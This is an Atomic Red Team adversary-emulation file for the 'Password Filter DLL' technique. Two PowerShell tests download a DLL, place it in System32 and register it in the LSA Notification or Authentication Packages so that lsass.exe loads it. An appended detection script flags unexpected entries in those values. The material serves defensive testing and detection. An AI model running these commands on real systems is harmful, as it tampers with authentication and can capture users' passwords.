atomic-red-team/atomics/T1556.002/T1556.002.yaml
2024-07-17 02:53:43 +00:00


attack_technique: T1556.002
display_name: 'Modify Authentication Process: Password Filter DLL'
atomic_tests:
- name: Install and Register Password Filter DLL
  auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
  description: |
    Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
    The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
    Source is in the src folder.
    A reboot is required before the filter is loaded into lsass.exe.
    Administrative privileges are required to import the clean registry values back into LSA; you may have to do this manually afterwards for cleanup.
  supported_platforms:
  - windows
  input_arguments:
    dll_path:
      description: Path to DLL to be installed and registered
      type: path
      default: PathToAtomicsFolder\T1556.002\bin
    dll_name:
      description: Name of the Password Filter
      type: string
      default: AtomicRedTeamPWFilter.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AtomicRedTeamPWFilter.dll must exist on disk at the specified location (#{dll_path}\#{dll_name})
    prereq_command: |
      if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
  executor:
    command: |
      reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
      $passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
      $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
      $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
      $notificationPackagesValues += $passwordFilterName
      Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
    cleanup_command: |
      reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
      remove-item C:\Windows\System32\#{dll_name}
    name: powershell
    elevation_required: true
- name: Install Additional Authentication Packages
  auto_generated_guid: 91580da6-bc6e-431b-8b88-ac77180005f2
  description: |
    lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value.
    Uses PowerShell to install and register a password filter DLL as an additional authentication package. Requires a reboot and administrative privileges.
    The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
    Source is in the src folder.
    A reboot is required before the filter is loaded into lsass.exe.
    Administrative privileges are required to import the clean registry values back into LSA; you may have to do this manually afterwards for cleanup.
  supported_platforms:
  - windows
  input_arguments:
    dll_path:
      description: Path to DLL to be installed and registered as additional authentication package
      type: path
      default: PathToAtomicsFolder\T1556.002\bin
    dll_name:
      description: Name of the Password Filter
      type: string
      default: AtomicRedTeamPWFilter.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AtomicRedTeamPWFilter.dll must exist on disk at the specified location (#{dll_path}\#{dll_name})
    prereq_command: |
      if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
  executor:
    command: |
      reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
      $passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
      $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
      $AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
      $AuthenticationPackagesValues += $passwordFilterName
      Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues
    cleanup_command: |
      reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
      remove-item C:\Windows\System32\#{dll_name}
    name: powershell
    elevation_required: true
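Added defender's example, not part of these atomic tests or of the Atomic Red Team project: both executors above snapshot the Lsa key with `reg.exe export` before appending a DLL name to `Notification Packages` or `Authentication Packages`, and the same kind of export is what an auditor can parse from a fleet. The script below decodes the `hex(7)` (REG_MULTI_SZ) values from such a .reg export and reports entries outside an assumed stock baseline (`scecli`, `rassfm`, `msv1_0`); the sample export is constructed and carries the DLL name the tests add.

```python
import re

# Packages normally present on a stock Windows host (assumed baseline; tune per environment).
BASELINE = {
    "Notification Packages": {"scecli", "rassfm"},
    "Authentication Packages": {"msv1_0"},
}
LSA_KEY = r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]"
VALUE_RE = re.compile(r'^"([^"]+)"=hex\(7\):([0-9a-fA-F,]+)$')


def decode_multi_sz(hex_field: str) -> list[str]:
    """hex(7) is REG_MULTI_SZ: UTF-16LE bytes as comma-separated hex, NUL-separated strings."""
    raw = bytes(int(b, 16) for b in hex_field.split(",") if b)
    return [s for s in raw.decode("utf-16-le").split("\x00") if s]


def lsa_packages(reg_text: str) -> dict[str, list[str]]:
    """Return the two LSA package lists from a reg.exe export (such as lsa_backup.reg above)."""
    joined = re.sub(r",\\\r?\n\s*", ",", reg_text)  # reg.exe wraps long values with ",\"
    found, in_lsa = {}, False
    for line in joined.splitlines():
        if line.startswith("["):
            in_lsa = line.strip().lower() == LSA_KEY.lower()
            continue
        m = VALUE_RE.match(line.strip()) if in_lsa else None
        if m and m.group(1) in BASELINE:
            found[m.group(1)] = decode_multi_sz(m.group(2))
    return found


def unexpected_packages(reg_text: str) -> dict[str, list[str]]:
    """Entries outside the baseline: candidate rogue password filters or auth packages."""
    return {name: [p for p in pkgs if p.lower() not in BASELINE[name]]
            for name, pkgs in lsa_packages(reg_text).items()}


# Constructed sample export: stock values plus the DLL name the tests above append.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,41,00,74,00,\
  6f,00,6d,00,69,00,63,00,52,00,65,00,64,00,54,00,65,00,61,00,6d,00,50,00,57,00,46,00,\
  69,00,6c,00,74,00,65,00,72,00,00,00,00,00
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,00,00
"""

if __name__ == "__main__":
    for value_name, rogue in unexpected_packages(SAMPLE_REG).items():
        print(f"{value_name}: {rogue or 'no unexpected entries'}")
```

Any name reported that is not a known, signed package installed by your own tooling is worth correlating with a new DLL in System32 and with the next lsass.exe module load after reboot.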